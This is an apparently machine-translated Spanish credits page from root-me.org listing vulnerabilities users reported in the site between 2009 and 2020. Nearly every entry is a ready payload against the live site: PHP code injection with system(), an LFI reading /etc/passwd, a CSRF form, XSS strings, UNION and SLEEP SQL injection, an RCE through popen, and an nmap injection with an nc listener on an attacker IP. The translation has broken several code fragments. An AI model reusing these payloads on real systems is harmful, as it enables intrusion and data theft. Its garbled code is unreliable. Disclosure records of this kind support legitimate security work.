Hacks

Como en cualquier sistema de información, se detectaron algunos puntos débiles en el sitio web.

 [02/12/2009] realencontró una vulnerabilidad de inyección de código :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'

 [02/02/2011] hello encontró varios XSS almacenados en el sistema PM :

<script>[código javascript/vbscript]</script>

 [15/02/2011] EsSandreencontró un LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

 [30/06/2011] elyfean encontró un CSRF en el chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

 [11/07/2011] Armel encontró un XSS almacenado en el chatbox.

&lt;iframe src="javascript:[código javascript]' /&gt;
&lt;/código&gt;

 [18/07/2011] g0uZencontrado una vulnerabilidad de inyección de código PHP en las "herramientas en línea : nmap"

Anfitrión para escanear en modo -sV :

--version-trace -p8888 [atacante del servidor IP]

Servicio de escucha en el servidor del atacante

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$( $i+1 )); done
</?php>

 [02/10/2011] Hypnozese ha encontrado una referencia indirecta insegura a un objeto que conduce a un acceso no autorizado a todos los PM :

http://www.root-me.org/spip.php?page=messagerie&amp;id=write&amp;repondre=[id_message_to_read]

 [23/10/2011] courte66se ha encontrado un XSS reflejado en la página "encode - decode" :

Texto a decodificar en base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

 [20/03/2012] jimeeencontró un LFI en un desafío :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

 [06/11/2012] jimeeencontró varios XSS almacenados en la gestión de perfiles de usuario :

<script>[código javascript/vbscript]</script>

 [15/05/2020] Lalukaidentificó múltiples vulnerabilidades : 3 XSS reflejadas, 2 SQLi y 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&amp;null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&amp;id_article=1&amp;_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(dominio)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&amp;var_profile=pouet'/&gt;alert<script>(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&amp;lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&amp;where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&amp;id_article=1&amp;ajouter=non&amp;tri_liste_aut=statut&amp;deplacer=oui&amp;_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

 Podaliriusidentificó una vulnerabilidad que permitía el acceso a los documentos adjuntos a las soluciones sin restricciones :

<imgXX>